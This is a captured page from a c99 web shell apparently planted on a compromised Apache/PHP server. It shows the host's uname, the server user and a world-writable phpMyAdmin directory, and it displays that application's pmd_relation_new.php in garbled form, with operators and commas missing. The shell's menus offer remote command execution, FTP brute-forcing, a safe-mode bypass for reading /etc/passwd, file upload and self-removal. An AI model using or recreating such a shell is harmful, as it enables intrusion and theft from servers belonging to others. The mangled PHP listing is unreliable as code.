!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/phpMyAdmin/   drwxrwxrwx
Free 40.56 GB of 127.8 GB (31.74%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     pmd_relation_new.php (3.89 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
/* vim: set expandtab sw=4 ts=4 sts=4: */
/**
 *
 * @package phpMyAdmin-Designer
 */

/**
 *
 */
include_once 'pmd_common.php';
$die_save_pos 0;
include_once 
'pmd_save_pos.php';
extract($_POSTEXTR_SKIP);

$tables PMA_DBI_get_tables_full($db$T1);
$type_T1 strtoupper($tables[$T1]['ENGINE']);
$tables PMA_DBI_get_tables_full($db$T2);
//print_r($tables);
//die();
$type_T2 strtoupper($tables[$T2]['ENGINE']);

// native foreign key
if (PMA_foreignkey_supported($type_T1) && PMA_foreignkey_supported($type_T2) && $type_T1 == $type_T2) {
    
// relation exists?
    
$existrel_foreign PMA_getForeigners($db$T2'''foreign');
    if (isset(
$existrel_foreign[$F2])
     && isset(
$existrel_foreign[$F2]['constraint'])) {
         
PMD_return_new(0,__('Error: relation already exists.'));
    }
// note: in InnoDB, the index does not requires to be on a PRIMARY
// or UNIQUE key
// improve: check all other requirements for InnoDB relations
    
$result      PMA_DBI_query('SHOW INDEX FROM ' PMA_backquote($T1) . ';');
    
$index_array1   = array(); // will be use to emphasis prim. keys in the table view
    
while ($row PMA_DBI_fetch_assoc($result))
        
$index_array1[$row['Column_name']] = 1;
    
PMA_DBI_free_result($result);

    
$result     PMA_DBI_query('SHOW INDEX FROM ' PMA_backquote($T2) . ';');
    
$index_array2  = array(); // will be used to emphasis prim. keys in the table view
    
while ($row PMA_DBI_fetch_assoc($result))
        
$index_array2[$row['Column_name']] = 1;
    
PMA_DBI_free_result($result);

    if (! empty(
$index_array1[$F1]) && ! empty($index_array2[$F2])) {
        
$upd_query  'ALTER TABLE ' PMA_backquote($T2)
                 . 
' ADD FOREIGN KEY ('
                 
PMA_backquote($F2) . ')'
                 
' REFERENCES '
                 
PMA_backquote($db) . '.'
                 
PMA_backquote($T1) . '('
                 
PMA_backquote($F1) . ')';

        if (
$on_delete != 'nix') {
            
$upd_query   .= ' ON DELETE ' $on_delete;
        }
        if (
$on_update != 'nix') {
            
$upd_query   .= ' ON UPDATE ' $on_update;
        }
        
PMA_DBI_try_query($upd_query) or PMD_return_new(0,__('Error: Relation not added.'));
    
PMD_return_new(1,__('FOREIGN KEY relation added'));
    }

// internal (pmadb) relation
} else {
    if (
$GLOBALS['cfgRelation']['relwork'] == false) {
        
PMD_return_new(0_('General relation features') . ':' _('Disabled'));
    } else {
        
// no need to recheck if the keys are primary or unique at this point,
        // this was checked on the interface part

        
$q  'INSERT INTO ' PMA_backquote($GLOBALS['cfgRelation']['db']) . '.' PMA_backquote($cfgRelation['relation'])
                            . 
'(master_db, master_table, master_field, foreign_db, foreign_table, foreign_field)'
                            
' values('
                            
'\'' PMA_sqlAddslashes($db) . '\', '
                            
'\'' PMA_sqlAddslashes($T2) . '\', '
                            
'\'' PMA_sqlAddslashes($F2) . '\', '
                            
'\'' PMA_sqlAddslashes($db) . '\', '
                            
'\'' PMA_sqlAddslashes($T1) . '\','
                            
'\'' PMA_sqlAddslashes($F1) . '\')';

        if (
PMA_query_as_controluser($q falsePMA_DBI_QUERY_STORE)) {
            
PMD_return_new(1__('Internal relation added'));
        } else {
            
PMD_return_new(0__('Error: Relation not added.'));
        }
   }
}

function 
PMD_return_new($b,$ret)
{
    global 
$db,$T1,$F1,$T2,$F2;
    
header("Content-Type: text/xml; charset=utf-8");//utf-8 .$_GLOBALS['charset']
    
header("Cache-Control: no-cache");
    die(
'<root act="relation_new" return="'.$ret.'" b="'.$b.
    
'" DB1="'.urlencode($db).
    
'" T1="'.urlencode($T1).
    
'" F1="'.urlencode($F1).
    
'" DB2="'.urlencode($db).
    
'" T2="'.urlencode($T2).
    
'" F2="'.urlencode($F2).
    
'"></root>');
}
?>

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0068 ]--